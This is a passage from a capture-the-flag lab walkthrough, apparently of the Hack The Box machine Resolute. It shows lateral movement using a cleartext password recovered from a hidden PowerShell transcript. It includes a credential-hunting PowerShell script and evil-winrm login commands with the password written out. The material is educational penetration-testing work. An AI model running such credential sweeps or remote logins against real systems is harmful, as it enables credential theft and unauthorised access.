WinRM
The ryan user appears to have administered the system with PowerShell transcription enabled; the transcript was written to a hidden file under C:\PSTranscripts and contains the user's cleartext credential.
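The find above was manual. The snippet below is an added example (not code from the original writeup) that automates it: it sweeps one or more directories for PowerShell transcript files, including hidden ones, and reports lines that look like cleartext credentials. It goes a step beyond the page by also reading the OutputDirectory from the "Turn on PowerShell Transcription" policy key, since that is where a domain-wide transcription policy drops its files. The demo directory, the regex patterns and the sample transcript are constructed for illustration; only the password value is taken from the page.

```powershell
# Added example, not from the original writeup. Hunts PowerShell transcripts
# (hidden ones included) for cleartext credentials. Paths, patterns and the
# sample transcript below are constructed for the demo.

function Get-TranscriptRoots {
    # Caller-supplied roots plus the OutputDirectory of the transcription
    # policy, when one is configured on this host.
    param([string[]] $Root)
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription' `
                               -ErrorAction SilentlyContinue
    if ($policy -and $policy.OutputDirectory) { $Root += $policy.OutputDirectory }
    $Root | Where-Object { Test-Path -LiteralPath $_ } | Select-Object -Unique
}

function Find-TranscriptCredentials {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $Root,
        # -match is case-insensitive by default in PowerShell
        [string[]] $Pattern = @(
            'ConvertTo-SecureString\s.*-AsPlainText',   # secret built from a string literal
            '\bnet\s+(user|use)\s+\S+\s+[^/\s]\S*',      # net user/use <target> <password>
            '/user:\S+\s+[^/\s]\S*',                     # runas / cmdkey style
            '\b(password|passwd|pwd)\s*[=:]\s*\S+'       # key=value style
        )
    )
    $roots = Get-TranscriptRoots -Root $Root
    if (-not $roots) { return }
    # -Force is what surfaces hidden files and directories; keep only files
    # whose header marks them as a transcript.
    $files = Get-ChildItem -Path $roots -Recurse -Force -File -Filter '*.txt' -ErrorAction SilentlyContinue |
             Where-Object { (Get-Content -LiteralPath $_.FullName -TotalCount 2 -Force) -match 'transcript start' }
    foreach ($f in $files) {
        $n = 0
        foreach ($line in [System.IO.File]::ReadLines($f.FullName)) {
            $n++
            $hit = $Pattern | Where-Object { $line -match $_ } | Select-Object -First 1
            if ($hit) {
                [pscustomobject]@{ File = $f.FullName; Line = $n; Pattern = $hit; Text = $line.Trim() }
            }
        }
    }
}

# --- Demo with a constructed transcript (the real one is not reproduced here) ---
$demo   = Join-Path ([System.IO.Path]::GetTempPath()) 'pstranscript-demo'
$null   = New-Item -ItemType Directory -Path $demo -Force
$sample = Join-Path $demo 'PowerShell_transcript.RESOLUTE.sample.txt'
@'
**********************
Windows PowerShell transcript start
Start time: 20191203133000
Username: MEGABANK\ryan
**********************
PS C:\Windows\system32> net user ryan Serv3r4Admin4cc123! /domain
PS C:\Windows\system32> Get-Service WinRM
**********************
Windows PowerShell transcript end
**********************
'@ | Set-Content -LiteralPath $sample -Force
# Hide the file, as the transcript on Resolute was hidden
[System.IO.File]::SetAttributes($sample, [System.IO.FileAttributes]::Hidden)

Find-TranscriptCredentials -Root $demo | Format-Table -AutoSize
```

Run it from an evil-winrm shell against C:\ (or any suspect directory) to sweep for transcripts; the same function, minus the demo section, doubles as a blue-team check that transcript directories are not leaking secrets to low-privilege readers.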
*Evil-WinRM* PS C:\PSTranscripts\20191203> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            6/10/2023 12:34:02 PM
Password expires             Never
Password changeable          6/11/2023 12:34:02 PM
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.
The ryan user was found earlier to have a transitive membership in the Remote Desktop Users group through the Contractors group.
Since Windows doesn't delegate WinRM session credentials to a second hop by default (the Kerberos double-hop problem), I open a fresh evil-winrm session as ryan rather than trying to nest one inside the current shell.
┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ evil-winrm -i resolute.megabank.local -u ryan -p 'Serv3r4Admin4cc123!'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> hostname
Resolute
*Evil-WinRM* PS C:\Users\ryan\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
Lateral movement to the ryan user is complete.